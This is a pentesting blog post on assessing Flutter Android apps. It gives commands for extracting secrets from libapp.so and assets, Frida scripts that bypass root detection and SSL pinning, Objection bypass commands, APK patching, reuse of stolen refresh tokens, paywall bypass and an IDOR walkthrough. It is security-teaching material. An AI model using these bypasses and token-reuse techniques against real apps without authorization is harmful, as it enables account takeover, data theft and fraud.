WEBINAR
How Elite Teams Outpace the Average Adversary
WEBINAR
How Elite Teams Outpace the Average Adversary

Hacking Flutter Apps: Static, Dynamic, and Beyond

Flutter is Google’s cross-platform app framework that lets developers write apps in Dart and ship them to Android, iOS, web, and desktop without rewriting code. Instead of traditional Java or Kotlin for Android, Flutter compiles Dart into native ARM binaries and packages it with the Flutter engine. On Android, that produces an APK or AAB containing a tiny Java/Kotlin wrapper, the Flutter runtime, a native library called libapp.so (where all your Dart logic lives), and an assets/flutter_assets folder holding Dart VM snapshots, configs, and UI assets. This is great for developers, but it means that when you’re pentesting, you can’t just fire up JADX and expect to see all the business logic; most of it is buried in native code.

When I get a Flutter app for testing, my process starts with simply getting the APK. If it’s an internal build, I pull it from a device using:

# Step 1: Get the installation path of the target package

adb shell pm path com.example.app

# Example output:

package:/data/app/~~abc123xyz==/com.example.app-1/base.apk

# Step 2: Pull the APK from the returned path to the local machine

adb pull /data/app/~~abc123xyz==/com.example.app-1/base.apk

The first command reveals the exact filesystem location of the installed APK.

The second command copies the APK from the device to the local system so it can be analyzed using static or dynamic testing tools.

If it’s a public app, I download it using Raccoon or APKPure.

Raccoon → Pulls directly from Google Play

APKPure → Mirrors publicly released APKs

Once I have the APK, I unpack it with apktool d app.apk and browse the output. The smali code is usually minimal, just a MainActivity or FlutterActivity bootstrap. The real target is libapp.so inside lib/arm64-v8a or lib/armeabi-v7a. I also check assets/flutter_assets for kernel_blob.bin, isolate_snapshot_data, AssetManifest.json, and other static files that sometimes contain secrets, hardcoded API endpoints, or even debug toggles.

For static analysis, I start simple:

# Extract strings from the binary file and search for case-insensitive text

strings lib/arm64-v8a/libapp.so | grep -i key

strings lib/arm64-v8a/libapp.so | grep -i api

strings lib/arm64-v8a/libapp.so | grep -i http

The strings utility extracts human-readable sequences from the compiled binary, which can reveal embedded constants that survived compilation. By filtering for terms such as “key”, “api”, or “http”, I can quickly surface references to API endpoints, authentication-related identifiers, or configuration artifacts. While this does not immediately confirm the presence of a vulnerability, it provides high-signal entry points for deeper static analysis or targeted runtime instrumentation.

I’ve pulled AWS keys, Firebase tokens, Stripe API keys, and internal staging URLs from Flutter binaries this way. In one case, a production build contained the constant DEBUG_API_BASE=https://staging-api.example.com. This indicated that the application retained a reference to a non-production backend environment. Access to such staging systems can significantly expand the attack surface, as they often mirror production functionality while lacking equivalent monitoring, authentication hardening, data protections, or configuration restrictions.

Then I open the binary in Ghidra or radare2. In Flutter applications, much of the business logic is compiled into native shared libraries (e.g., libapp.so). I load these into Ghidra or radare2, depending on the task at hand. radare2 works well for automation and pattern-based analysis, whereas Ghidra’s decompiler and UI are better suited for manually tracing logic and understanding control flow. While the compiled Dart is not human-readable, you can still identify functions that handle crypto, networking, or business logic. For example, I’ve hooked into methods that check subscription status and force them to return true, essentially bypassing paywalls during testing.

If kernel_blob.bin is present, I try ReFlutter from GitHub to extract partial Dart code. In a few lucky cases, I’ve recovered readable function names like verifyUserToken or fetchOrders. In Flutter applications, where much of the Dart logic is compiled into native code, symbol names can reveal high-value functionality. When I encounter functions related to authentication, certificate validation, or token handling, they become immediate candidates for runtime instrumentation using tools such as Frida. This allows me to observe how sensitive data is processed without having to reverse-engineer the entire binary upfront.

The AndroidManifest.xml is another treasure chest. I’ve found exported BroadcastReceivers that accepted intents with JSON payloads, which were directly processed by the app without auth checks. In one assessment, this misconfiguration resulted in remote data injection. In another case, it exposed an internal API surface that could be triggered from a separate application context.

The root cause was insufficient validation around inter-process communication, allowing externally supplied data to reach privileged internal functionality. While the impact varied by application, it demonstrated how seemingly minor exposure points in Flutter apps can escalate into meaningful security risks.

On a rooted test device, I always check /data/data/<package>/shared_prefs/ and /databases/. Flutter developers sometimes forget that SharedPreferences is just plaintext XML. I’ve found refresh tokens, access tokens, and PII stored there. For example, /data/data/com.example/shared_prefs/user.xml contained:

<string name="refresh_token">eyJhbGciOiJIUzI1NiIsInR5cCI6...</string>

Dropping that token into Postman gave me instant API access. For dynamic analysis, I fire up Frida. You can install it with:

pip install frida-tools

Push the matching frida-server binary to the device:

# Move the frida-server binary on your device

adb push frida-server /data/local/tmp/

# Update permissions on the binary file to allow exeuction and execute

adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &"

Attach with:

# Connect to the device and attach to already running app by name

frida -U -n com.example.app

Root detection bypass often lives in Java, so hooking it is simple:

Java.perform(function() {

var RootCheck = Java.use("com.example.RootCheck");

RootCheck.isDeviceRooted.implementation = function() {

console.log("Root bypassed");

return false;

};

});

But SSL pinning in Flutter is trickier. The usual Java X509TrustManager hook might fail because dart:io uses native TLS. Hooking libapp.so works:

var ssl_verify = Module.findExportByName("libapp.so", "SSL_CTX_set_custom_verify");

if (ssl_verify) {

Interceptor.attach(ssl_verify, {

onEnter: function(args) {

console.log("Bypassing SSL pinning");

}

});

}

With that running, I set my device to proxy through Burp Suite or mitmproxy, and suddenly I’m seeing and modifying every API call.

The vulnerabilities I’ve found this way are very familiar:

  • IDORs: changing GET /api/user/1001 to GET /api/user/1002 and getting someone else’s data.
  • Privilege escalation: sending admin-only API calls from a normal account and having them succeed.
  • Weak JWT validation: modifying the payload and resigning with none algorithm to impersonate other users.
  • GraphQL data exposure: apps that ship the GraphQL schema in assets/, letting me query sensitive fields hidden from the UI.
  • Debug logging leaks: verbose logs in logcat showing API keys and full JSON responses.
  • Local storage leaks: tokens, credentials, and private keys stored without encryption.
  • Bypassing paywalls: hooking native “checkSubscription” functions to always return true.

For logic bypasses, I sometimes use Objection. Run:

objection --gadget com.example.app explore

The --gadget flag instructs Objection to attach to an application that contains an embedded Frida gadget rather than spawning a new process. This is particularly useful in environments where spawning or attaching traditionally is restricted. Once connected, the interactive shell enables runtime inspection of application behavior, method hooking, and targeted manipulation of sensitive logic paths.

Then try:

# Attempt to disable sslpinning

android sslpinning disable

# Attempt to trick the application into believing the device is not rooted

Android root disable

Sometimes it works out of the box, sometimes I need manual Frida hooks.

Patching the app is the next step if I want permanent bypasses. The workflow is:

# Dissassemble the APK

apktool d app.apk

# Replace libapp.so with patched version

apktool b app_folder

apksigner sign --ks my.keystore app.apk

adb install app.apk

This lets me inject debug logs, skip checks entirely, or hardcode alternate API endpoints for testing.

Over time, I’ve built a small Flutter Pentest Toolkit:

# Extract secrets

strings lib/arm64-v8a/libapp.so | grep -i key

grep -r "api" assets/flutter_assets

 

# Run Frida

adb push frida-server /data/local/tmp/

adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &"

frida -U -n com.example.app

 

# Objection quick bypass

objection --gadget com.example.app explore

 

# SSL pinning bypass (native)

Interceptor.attach(Module.findExportByName("libapp.so", "SSL_CTX_set_custom_verify"), {

onEnter: function(args) {

console.log("SSL bypass");

}

});

Imagine you are doing a pentest on a new Flutter-based Android banking app. The client says it’s secure because “Flutter compiles to native code, so it’s hard to reverse.” You smile because you’ve heard that before!

The APK is handed to you. First move:

# Dissassemble the APK

apktool d test.apk

Inside the smali folder, you find almost nothing but MainActivity extending FlutterActivity. The real action is in lib/arm64-v8a/libapp.so and assets/flutter_assets. You run:

strings lib/arm64-v8a/libapp.so | grep -i api

The command strings lib/arm64-v8a/libapp.so | grep -i api scans a compiled Flutter binary and extracts any readable text that contains the word “api.” Even though the file is machine code, hardcoded strings like API URLs, staging endpoints, or API keys often remain in plain text inside it. The strings command pulls out readable content, and grep -i api filters it case-insensitively. This quick check can reveal hidden backend URLs or debug configurations during mobile app testing.

Once you run it, you will immediately spot:

https://api.test.com/v1/

https://staging-api.test.com/v1/

Two endpoints, production and staging, both live in the binary. That staging URL might be a lower-security environment worth testing.

Next, you grep the flutter_assets folder:

grep -r "key" assets/flutter_assets

You hit a jackpot:

"firebaseApiKey": "AIzaSyXXXXXX"

"encryptionKey": "supersecretkey123"

These are cleartext API keys, sitting in production code. You then check AndroidManifest.xml. You find an exported activity:

<activity android:name="com.test.activities.SettingsActivity"

android:exported="true">

<intent-filter>

<action android:name="com.test.OPEN_SETTINGS"/>

</intent-filter>

</activity>

This means any app on the device can send an intent to open this screen, potentially triggering code you shouldn’t have access to.

Static phase done, you now move to dynamic testing. You start Frida:

adb push frida-server /data/local/tmp/

adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &"

frida -U -n com.test.app

You suspect SSL pinning, so you hook it:

var ssl_verify = Module.findExportByName("libapp.so", "SSL_CTX_set_custom_verify");

if (ssl_verify) {

Interceptor.attach(ssl_verify, {

onEnter: function(args) {

console.log("SSL pinning bypassed");

}

});

}

With Burp Suite now intercepting traffic, you log in with a test account. In Burp’s HTTP history, you see:

GET /api/user/1001

You send this request to Repeater, change 1001 to 1002, and hit send. You get another user’s profile, complete with account balance and transaction history. Classic IDOR.

The vulnerabilities you can find in Flutter apps are the same families as other mobile apps, broken authentication, IDORs, weak cryptography, insecure storage, insufficient transport security, but you get them by going through native analysis and runtime hooking rather than just Java decompilation.

The key lesson is that pentesting Flutter apps means treating them like native Android apps plus binary reversing challenges. You need static analysis for secrets and endpoints, dynamic hooking for SSL bypass and runtime manipulation, and API abuse testing for business logic flaws. Flutter changes the path to get there, but the vulnerabilities are just as real.

Another interesting area is Flutter webviews. Even though Flutter itself renders UI with Skia, many apps embed a native WebView for certain sections. If the WebView is configured with javascriptEnabled and loads local files or untrusted URLs, you can inject malicious JavaScript to perform attacks like XSS or steal local storage tokens. Testing for this involves looking into where the WebView loads data and whether navigation is properly restricted.

Installing the tools for this kind of work is straightforward. On Linux or macOS, apktool can be installed via package managers like brew install apktool or apt install apktool. Ghidra is available from ghidra-sre.org, and Frida can be installed with pip install frida-tools. Objection is installed with pip install objection. For MITM work, Burp Suite or mitmproxy is essential. You’ll also want the Android SDK’s adb tool for interacting with devices, which comes with Android Studio or can be installed separately. On rooted test devices, Magisk modules like frida-server or Xposed can make hooking easier.

A real pentest of a Flutter app usually blends static and dynamic analysis, moving between reverse engineering and live testing until vulnerabilities emerge. The goal is not just to bypass protections but to understand how the app communicates, where it stores data, and whether its logic can be abused. While Flutter adds some unique challenges, it also hides many developers’ mistakes in plain sight. With the right tools, patience, and methodical testing, those mistakes can be uncovered. And since Flutter is only growing in popularity, knowing how to pentest it properly is becoming a very useful skill for any security professional.

To make this methodology easier to follow during assessments, here’s a quick checklist summarizing the static and dynamic testing steps discussed above:

Static Analysis:

  • Decompile the APK to inspect its structure.
  • Review AndroidManifest.xml for exported activities, services, receivers, and deep links.
  • Locate Flutter-specific components such as lib/arm64-v8a/libapp.so and assets/flutter_assets/.
  • Extract readable strings from libapp.so to identify hardcoded API endpoints, keys, and configuration values.
  • Search libapp.so for potential secrets or credentials.
  • Search flutter_assets for embedded configuration data or keys.
  • Look for backend URLs or staging environments embedded in the binary or assets.
  • Reverse engineer libapp.so using tools such as Ghidra or radare2 to identify authentication logic, crypto routines, or subscription checks.
  • Analyze kernel_blob.bin (if present) using tools such as ReFlutter to recover Dart function names or partial logic.
  • Inspect local application storage such as /data/data/<package>/shared_prefs/ for plaintext tokens or credentials.
  • Inspect /data/data/<package>/databases/ for stored user data or session information.

Dynamic Analysis

  • Run the application on a rooted Android device or emulator to enable runtime testing.
  • Start Frida server on the device.
  • Launch the Frida server process on the device.
  • Attach Frida to the running application.
  • Hook Java methods to bypass root detection checks.
  • Hook native functions in libapp.so to bypass SSL pinning.
  • Configure the device to proxy traffic through Burp Suite or mitmproxy.
  • Intercept and modify API requests to test for IDOR vulnerabilities.
  • Modify API requests to test for privilege escalation issues.
  • Manipulate authentication tokens to test for weak JWT validation.
  • Query backend APIs or schemas to identify GraphQL data exposure.
  • Monitor logcat for sensitive debug logs or leaked API responses.
  • Use Objection to perform runtime exploration and quick security checks.
  • Attempt automated runtime bypasses using Objection commands such as
    android sslpinning disable and android root disable.
  • Patch and rebuild the APK when necessary to bypass protections or modify application behavior.

For those who want to build the skills, here’s a quick resource set to learn:

When the engagement is over, and the APKs are dusted, you start to see Flutter for what it really is: a clever layer hiding the same old weaknesses, just wrapped in a fresh coat of cross-platform paint. Every tap, every HTTP call, every bit of Dart code running inside that engine is an opportunity. You’ve sifted through obfuscated classes until they made sense, torn apart assets the developer thought were hidden, and bent runtime execution to your will. The rush comes when you chain it all together, a debug interface here, an exposed method there, a weak crypto routine in between, and suddenly the walls come down. That’s the beauty of red teaming: it’s not about ticking boxes, it’s about thinking sideways, turning assumptions against the app, and showing that security is a mindset, not a feature. Flutter may be fast, modern, and pretty, but in the end, it plays by the same rules. And rules, as every hacker knows, are made to be broken.

Happy Hacking!

New call-to-action

 

Back to Blog
About Cobalt Core
Cobalt Core is our trusted community of vetted pentesters and security researchers. With expertise spanning cloud security, identity attack paths, application security, and offensive tradecraft, Core contributors share hands-on research and real-world insights to help organizations uncover risk and build more resilient security programs. More By Cobalt Core
Partner Spotlight: Tugboat Logic
Compliance can be expensive, time-consuming and needlessly confusing. Tugboat Logic changes that.
Blog
Feb 2, 2022